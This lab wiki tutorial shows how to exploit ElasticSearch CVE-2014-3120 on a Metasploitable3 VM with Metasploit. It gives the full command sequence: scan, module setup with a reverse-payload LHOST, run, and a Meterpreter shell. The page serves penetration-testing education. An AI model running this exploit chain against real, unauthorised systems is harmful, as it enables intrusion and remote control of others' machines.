Metasploit Framework MSF

From Embedded Lab Vienna for IoT & Security

Summary

The Metasploit Framework (MSF) is a tool for finding and exploiting security vulnerabilities in an IT network infrastructure, an activity called penetration testing. Penetration testing is often referred to as "ethical hacking". The aim of the penetration tester is to analyse a specific target or a whole network domain. The framework also provides an Application Programming Interface (API) that lets security developers modify existing modules or write new vulnerability modules within the framework.

A penetration test proceeds in several stages to get the best results. First, the scope is agreed with the customer: which devices in the target domain may be attacked. Next, information gathering (also called intelligence gathering) collects enough details about the target to identify weak points. Once one or more weak points are found, the penetration tester works out how to gain access to the affected systems. When a way in has been determined, the exploit is run against the system. After access has been gained, post-exploitation collects important data from inside the compromised network domain.

Requirements

  • Operating system: Linux, e.g. Kali Linux or Ubuntu 18.04
  • Packages: metasploit-framework (provides msfconsole), postgresql, git, nmap, virtualbox

Before following these steps you must have completed the Metasploit Framework, Metasploitable3, and PostgreSQL or MySQL installation documentation.

Description of exploit

This is a short step-by-step guide to running an exploit against a Windows Server 2008 virtual machine. The chosen target application is ElasticSearch prior to version 1.2.0, which is already installed in the Metasploitable3 virtual machine from Rapid7.

The module exploit/multi/elasticsearch/script_mvel_rce exploits a remote code execution (RCE) vulnerability in ElasticSearch (CVE-2014-3120). The REST API requires no authentication, and its search function allows dynamic MVEL scripts to be executed server-side. A remote attacker can therefore run arbitrary Java code on the target system with the privileges of the ElasticSearch service. From version 1.2.0 on, dynamic scripting is disabled by default, so the module's check fails against patched nodes.

Step 1: open msf tool

Enter the following command in the shell to open the framework's console:

msfconsole

Msfconsole.png

Step 2: nmap scan

Enter the following command in the console to detect the open ports of the target virtual machine (-Pn skips ping-based host discovery, which Windows firewalls often block):

db_nmap -Pn 172.28.128.3

DbNmap.png

This command saves the scan results directly to the database you configured. Enter the following command to check the saved results:

services

Services.png

Step 3: search module

Enter the following command to search for exploit modules whose name or description matches elastic:

search elastic

ExploitSearchElastic.png

Step 4: use module

Enter the following command to select the exploit module:

use exploit/multi/elasticsearch/script_mvel_rce

ExploitElasticUse.png

Enter the following command to display the module's description, targets and usage:

info

ExploitElasticInfo.png

Step 5: show module options

Enter the following command to show the module options:

show options

ExploitElasticOptions.png

Step 6: set module options

Enter the following commands to set the options: RHOSTS is the target, LHOST is the address on your attacking machine to which the reverse payload connects back, and RPORT 9200 is the ElasticSearch REST port (also the module default):

set rhosts 172.28.128.3
set verbose true
set lhost 172.28.128.1
set rport 9200

ExploitElasticSet.png

Check your settings again with the command:

show options

ExploitElasticOptions2.png

Step 7: vulnerability and exploit

Enter the following command to check whether the target is vulnerable without actually exploiting it:

check

ExploitElasticCheck.png

Enter the following command to run the exploit:

run

ExploitElasticRun.png

A Meterpreter session should open, from which post-exploitation can be performed. If no session comes back, check the firewall configuration on both the attacking host and the target: the payload must be able to reach LHOST on the listener port.

Step 8: meterpreter shell

Enter the following command in the Meterpreter session to open a command-line interface (CLI) shell on the target host:

shell

MeterpreterShell.png

Enter the following command in that shell to check where the payload .jar file was dropped (xxx is a placeholder for the actual file name):

DIR /s C:\WINDOWS\TEMP\xxx.jar

MeterpreterShellJar.png

Used Hardware

Hardware.png